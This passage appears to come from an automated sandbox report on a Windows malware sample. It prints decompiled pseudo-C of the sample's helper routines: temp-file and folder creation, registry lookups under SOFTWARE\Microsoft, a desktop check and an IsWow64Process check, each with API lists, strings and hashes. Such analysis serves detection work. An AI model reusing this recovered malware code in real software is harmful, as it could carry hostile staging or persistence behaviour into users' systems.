				WCHAR* _t16;
				char* _t18;
				WCHAR* _t19;

				_t19 = __edi;
				 *__edi = 0;
				E00406CC9(__ecx,  &_v596);
				_t2 =  &_a4; // 0x40646b
				_t12 =  *_t2;
				if(_t12 == 0) {
					L6:
					_t18 =  &_v178;
					goto L7;
				} else {
					_t12 = _t12 - 1;
					if(_t12 == 0) {
						_t18 =  &_v198;
						L7:
						_t16 = 0x41e5f0;
						goto L8;
					} else {
						_t12 = _t12 - 1;
						if(_t12 == 0) {
							goto L6;
						} else {
							_t14 = _t12 - 1;
							if(_t14 == 0) {
								_t16 = L"SOFTWARE\\Microsoft";
								_t18 =  &_v158;
								L8:
								_t21 =  &_v108;
								_t14 = E00411311(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
								if(_t14 != 0) {
									_t14 = E00416745(_t21, _t19, _t16);
									if(_t14 == 0) {
										L12:
										_t14 = 0;
										 *_t19 = 0;
									} else {
										if(_a4 == 0) {
											_t14 = PathRenameExtensionW(_t19, L".dat");
											if(_t14 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t14;
			}

0x00406d1e
0x00406d2a
0x00406d35
0x00406d3a
0x00406d3d
0x00406d40
0x00406d60
0x00406d60
0x00000000
0x00406d42
0x00406d42
0x00406d43
0x00406d58
0x00406d66
0x00406d66
0x00000000
0x00406d45
0x00406d45
0x00406d46
0x00000000
0x00406d48
0x00406d48
0x00406d49
0x00406d4b
0x00406d50
0x00406d6b
0x00406d6f
0x00406d75
0x00406d7c
0x00406d82
0x00406d89
0x00406da1
0x00406da1
0x00406da3
0x00406d8b
0x00406d8f
0x00406d97
0x00406d9f
0x00000000
0x00000000
0x00406d9f
0x00406d8f
0x00406d89
0x00406d7c
0x00406d49
0x00406d46
0x00406d43
0x00406da9

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,0041E5F0,00000000,00000032,?,77E49EB0,00000000), ref: 00406D97

Strings

SOFTWARE\Microsoft, xrefs: 00406D4B
kd@, xrefs: 00406D3A
.dat, xrefs: 00406D91

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft$kd@
API String ID: 3337224433-1301899116
Opcode ID: 127d66ff45b43ca125d60486128f21c1d8a54b3557ddd1bf2460bf575f947e20
Instruction ID: 89dc2482d47ac3911c6f231eaf28b535e19f73afadb74b6c94608404e1cab4be
Opcode Fuzzy Hash: 127d66ff45b43ca125d60486128f21c1d8a54b3557ddd1bf2460bf575f947e20
Instruction Fuzzy Hash: 0401F130700219AADB209B74CE40BEAB368AF81344F450077F806F22C0E73CDEA4C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00418161, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418161(void* __edx) {
				void _v108;
				char _v120;
				char _v212;
				long _v216;
				char _v224;
				void* __esi;
				void* _t8;
				void* _t16;

				_t16 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
					if(_t8 != 0 && _v216 == 0x4e) {
						E004069C2(0x92d1e1eb,  &_v212, 0);
						_t8 = E00411177( &_v224,  &_v120, 0x4c);
						if(_t8 == 0) {
							_t8 = E00417E1B( &_v120, _t16, 0x41fe78, _t8);
							if(_t8 == 0) {
								_t8 = E00418086(0x41fe78, 0);
							} else {
								 *0x41e590 =  *0x41e590 | 0x00000004;
							}
						}
					}
				}
				return _t8;
			}

0x00418161
0x00418175
0x0041817d
0x0041818e
0x00418196
0x004181ab
0x004181ba
0x004181c1
0x004181c9
0x004181d0
0x004181df
0x004181d2
0x004181d2
0x004181d2
0x004181d0
0x004181c1
0x00418196
0x004181e8

APIs

GetCurrentThreadId.KERNEL32 ref: 0041816E
GetThreadDesktop.USER32(00000000), ref: 00418175
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0041818E

Part of subcall function 00417E1B: TlsAlloc.KERNEL32(0041FE78,00000000,0000018C,00000000,00000000), ref: 00417E34

Strings

N, xrefs: 00418198

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: N
API String ID: 454308152-1130791706
Opcode ID: 062d4fd2bfbdabdd0aa5eceac9a05d11ffd3b13ba2d40cb7d3d4404fcbafbc34
Instruction ID: b56f609b0de39cda6622fb1b6d7f59f4252aecf3e6a65102bff70858e8c64588
Opcode Fuzzy Hash: 062d4fd2bfbdabdd0aa5eceac9a05d11ffd3b13ba2d40cb7d3d4404fcbafbc34
Instruction Fuzzy Hash: 1B01F7726447007BE620A7619D4AFE7379C9B00708F00452FFA15E21E0EF38DA89C69F

Uniqueness

Uniqueness Score: -1.00%

Function 0041623C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041623C(intOrPtr _a4, char _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E0041243F());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E00411DF9(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					_t5 =  &_a8; // 0x412be0
					if(E00416745(_t19,  *_t5,  &_v524) == 0 || E00416070(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0041625f
0x004162b9
0x00000000
0x004162b9
0x00416261
0x00416263
0x00416263
0x0041626b
0x0041626c
0x0041627b
0x00416281
0x00416286
0x0041628c
0x00000000
0x00000000
0x00416295
0x004162a1
0x004162b3
0x004162b7
0x00000000
0x00000000
0x00000000
0x004162c1
0x00000000
0x004162c1
0x004162a1
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 00416253

Part of subcall function 0041243F: GetTickCount.KERNEL32 ref: 0041243F

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

Part of subcall function 00416070: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,+A,004162AF,00000001,00000000,00000000,+A,?), ref: 0041608A
Part of subcall function 00416070: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004160AD
Part of subcall function 00416070: CloseHandle.KERNEL32(00000000), ref: 004160BA

Strings

+A, xrefs: 00416295
tmp, xrefs: 0041626C
%s%08x.%s, xrefs: 00416271

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp$+A
API String ID: 3395140874-1003815928
Opcode ID: f425d63e668f1630b2adf3729376117e9434de335027b571d865d14b18f07eec
Instruction ID: f502047c9eee2fd9657ae4218a466e2de827e189329ec1417e7748228a185e2d
Opcode Fuzzy Hash: f425d63e668f1630b2adf3729376117e9434de335027b571d865d14b18f07eec
Instruction Fuzzy Hash: 3301217594022826EE207A24DC06BEB371DDB42714F1241A3FE60B62E1D2B9CDDA869C

Uniqueness

Uniqueness Score: -1.00%

Function 004164C7, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004164C7(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

0x004164c9
0x004164d0
0x004164d8
0x004164dc
0x004164de
0x004164de
0x004164e0
0x004164e0
0x004164e6
0x00000000
0x00000000
0x0041651e
0x0041651e
0x00000000
0x004164f2
0x004164f2
0x004164f7
0x00416503
0x0041650e
0x0041650e
0x00416514
0x00416528
0x0041652b
0x00416516
0x00416519
0x00416523
0x00000000
0x00416523
0x0041651b
0x00000000
0x0041651b
0x00416514

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0040564B,?,?,?,?,?), ref: 004164D2
GetFileAttributesW.KERNEL32(?,?,00000000,0040564B,?,?,?,?,?), ref: 004164FA
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0040564B,?,?,?,?,?), ref: 00416508

Strings

.exe, xrefs: 004164CE

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: 778904d26f70faf715ccfea7a6dfd50feb6d1a11f594b1abd8981a6d058dea1a
Instruction ID: b296e16adbaf5266381eb15943103e15184f203eb26eeb2d2f2285b477f7cbc9
Opcode Fuzzy Hash: 778904d26f70faf715ccfea7a6dfd50feb6d1a11f594b1abd8981a6d058dea1a
Instruction Fuzzy Hash: 8CF0F6316412116AC6300B6969046F777999E01BB4B67552BFC91E3364D738ECC1D66C

Uniqueness

Uniqueness Score: -1.00%

Function 00410396, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410396(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x41ec80 == 0) {
					E00406D1E(__ecx, 0x41ec80, 2);
					 *((short*)(E00411142(0x41ee88, 0x41ec80, E00411C55(0x41ec80) + _t10) + 0x41ee88)) = 0;
					_t3 = PathRemoveFileSpecW(0x41ee88);
				}
				if(_t13 != 0) {
					E004114A7(_t3 | 0xffffffff, 0x41ec80, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x41e7fc > 1) {
					E004164C7(0x41ee88);
					E00414661(0x41ee88);
					_t3 = GetFileAttributesW(0x41ec80);
					if(_t3 != 0xffffffff) {
						return E00414661(0x41ec80);
					}
				}
				return _t3;
			}

0x00410396
0x004103aa
0x004103ae
0x004103c7
0x004103ce
0x004103ce
0x004103d6
0x004103df
0x004103ea
0x004103ea
0x004103f5
0x00410401
0x00410407
0x0041040d
0x00410416
0x00000000
0x00410419
0x00410416
0x00410420

APIs

PathRemoveFileSpecW.SHLWAPI(0041EE88,0041EE88,0041EC80,00000000,00000002,00000000,00020000,00410F09,00000001,?,404A9F61,00000002,00002723,00020000,00000000,00002722), ref: 004103CE
PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00410F09,00000001,?,404A9F61,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 004103EA
GetFileAttributesW.KERNEL32(0041EC80,0041EE88,0041EE88,00000000,00020000,00410F09,00000001,?,404A9F61,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 0041040D

Part of subcall function 00406D1E: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041E5F0,00000000,00000032,?,77E49EB0,00000000), ref: 00406D97

Strings

.tmp, xrefs: 004103E4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp
API String ID: 3627892477-2986845003
Opcode ID: 24abfd42e9b365e8392218d8372e6a93ad79fbc69afd2f1e94745a1b6fbe3a5b
Instruction ID: 395e199ffee47ae56be38f89108b9a1c2a25f710d8bcbe1646f48d27bb1ec5e3
Opcode Fuzzy Hash: 24abfd42e9b365e8392218d8372e6a93ad79fbc69afd2f1e94745a1b6fbe3a5b
Instruction Fuzzy Hash: 2EF0A23560021026E32037375C4AEFF95594FC2724F15853FF926A15E2CBBC48C6826D

Uniqueness

Uniqueness Score: -1.00%

Function 004162C9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E004162C9(void* __edx, void* __esi) {
				void* _t11;
				void* _t13;
				void* _t24;
				void* _t25;
				void* _t27;

				asm("in al, dx");
				asm("adc [eax+eax], al");
				 *((intOrPtr*)(__esi + 0x57)) =  *((intOrPtr*)(__esi + 0x57)) + __edx;
				if(GetTempPathW(0xf6, _t25 - 0x208) - 1 > 0xf5) {
					L6:
					_t11 = 0;
				} else {
					_t24 = 0;
					while(1) {
						_push(E0041243F());
						_push(L"tmp");
						_t21 = _t25 - 0x410;
						_t13 = E00411DF9(_t12, 0x104, _t25 - 0x410, L"%s%08x");
						_t27 = _t27 + 0xc;
						if(_t13 == 0xffffffff) {
							goto L6;
						}
						if(E00416745(_t21,  *(_t25 + 8), _t25 - 0x208) == 0 || CreateDirectoryW( *(_t25 + 8), 0) == 0) {
							_t24 = _t24 + 1;
							if(_t24 < 0x64) {
								continue;
							} else {
								goto L6;
							}
						} else {
							_t11 = 1;
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t11;
			}

0x004162c9
0x004162ca
0x004162cd
0x004162e8
0x0041633e
0x0041633e
0x004162ea
0x004162ea
0x004162ec
0x004162f1
0x004162f2
0x00416301
0x00416307
0x0041630c
0x00416312
0x00000000
0x00000000
0x00416327
0x00416338
0x0041633c
0x00000000
0x00000000
0x00000000
0x00000000
0x00416346
0x00416346
0x00416346
0x00000000
0x00416327
0x00000000
0x004162ec
0x00416340
0x00416343

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 004162DC

Part of subcall function 0041243F: GetTickCount.KERNEL32 ref: 0041243F

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0041632E

Strings

%s%08x, xrefs: 004162F7
tmp, xrefs: 004162F2

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: 04dbca1ce315deab7dd89dbcf0924a94e75cfe1d88b7cd1938c2f3929a15ab6a
Instruction ID: dceafe48e37272efd4990c1691396525ef3f70845153a0ac86ab32ffd0eb6a22
Opcode Fuzzy Hash: 04dbca1ce315deab7dd89dbcf0924a94e75cfe1d88b7cd1938c2f3929a15ab6a
Instruction Fuzzy Hash: 30F04F702003681BCF20AB24CD04BEAB7288B12314F1200B3EE70EA1E1C3B9CEC6874D

Uniqueness

Uniqueness Score: -1.00%

Function 00416070, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416070(WCHAR* _a4, void* _a8, long _a12) {
				long _t14;
				void* _t15;

				_t14 = 0;
				_t15 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t15 != 0xffffffff) {
					if(_a8 == 0 || _a12 == 0 || WriteFile(_t15, _a8, _a12,  &_a12, 0) != 0) {
						_t14 = 1;
					}
					CloseHandle(_t15);
					if(_t14 != 1) {
						E0041621B(_a4);
					}
				}
				return _t14;
			}

0x00416075
0x00416090
0x00416095
0x0041609a
0x004160b7
0x004160b7
0x004160ba
0x004160c3
0x004160c8
0x004160c8
0x004160c3
0x004160d2

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,+A,004162AF,00000001,00000000,00000000,+A,?), ref: 0041608A
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004160AD
CloseHandle.KERNEL32(00000000), ref: 004160BA

Strings

+A, xrefs: 00416070

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CloseCreateHandleWrite
String ID: +A
API String ID: 1065093856-2476349683
Opcode ID: d07631f879466671dfc98515ef254cc9fbdd1112f359b94b0b35e08d023f0984
Instruction ID: dfd4f39ee0db3b3ef5b18002600c4d87ea541684c7d806c35464b335ee721cfc
Opcode Fuzzy Hash: d07631f879466671dfc98515ef254cc9fbdd1112f359b94b0b35e08d023f0984
Instruction Fuzzy Hash: 27F06272141218BFEB21AE549C85FEB3B1DAB05354F09812BF910A51A0C375CDD58B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041290D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041290D(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x00412911
0x0041291a
0x00412922
0x00412944
0x0041294c
0x00412924
0x0041292a
0x00412932
0x00000000
0x00412934
0x0041293a
0x0041293e
0x00000000
0x00412940
0x00412943
0x00412943
0x0041293e
0x00412932

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00406240,00000000,0040675B), ref: 0041291A
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0041292A

Strings

kernel32.dll, xrefs: 00412915
IsWow64Process, xrefs: 00412924

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: fe8fec8c6535b4f49d39de23e23294976413fdb8656372ac0d61bcab90fb45ed
Instruction ID: 344f4064f754478aabcfd5f558ffddaffd40416491a667f935a38ffbebd0006b
Opcode Fuzzy Hash: fe8fec8c6535b4f49d39de23e23294976413fdb8656372ac0d61bcab90fb45ed
Instruction Fuzzy Hash: 26E0DFB0310341B6DF0497A4CF0ABAF32A89B407A9F2002A8A010F20E0EAB8CA44C52D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F932, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F932(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;
				intOrPtr _t9;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x41ec60);
					_t7 = E0040F357(_a4);
					if(_t7 != 0xffffffff) {
						_t9 =  *0x41ec78; // 0x0
						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
					}
					LeaveCriticalSection(0x41ec60);
					return _t7;
				}
				return _t6;
			}

0x0040f937
0x0040f948
0x0040f952
0x0040f95a
0x0040f95c
0x0040f969
0x0040f969
0x0040f970
0x00000000
0x0040f977
0x0040f978

APIs

EnterCriticalSection.KERNEL32(0041EC60), ref: 0040F948
SetEvent.KERNEL32(?), ref: 0040F969
LeaveCriticalSection.KERNEL32(0041EC60), ref: 0040F970

Strings

3, xrefs: 0040F939

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: 8641eccf56462653cb55a0ea56ccb3cb76e54571a0c61343356b8eeb7efde375
Instruction ID: 7eb9f8aec41773ad9457d99176e3be68b05ba7646cf83af48a0870e552f4cd3c
Opcode Fuzzy Hash: 8641eccf56462653cb55a0ea56ccb3cb76e54571a0c61343356b8eeb7efde375
Instruction Fuzzy Hash: E8E09235104200EFC7206B35AD48D6BB764EBD6335704C53EF415F22B0C7389855CA59

Uniqueness

Uniqueness Score: -1.00%

Function 00407EB3, Relevance: 6.3, APIs: 4, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407EB3(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E00416A93( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E00411106(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E00407B90(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E004111B9( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E00411564(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E00411564(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E00411564(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E00411564(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E00408EE0( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E00411159(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E00408EB7( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E00408EB7( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
											_t211 = E00416A93( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E00411106(_t211);
												E00408EB7( &_v60);
												_t239 = _a4;
												E00408EE0( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E00417165(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E00411091(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E00411142( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E00406DAC( &_v184, _t220, 1,  &_v288);
									_t186 = E004123AB( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E00411C43(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E0041146E( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
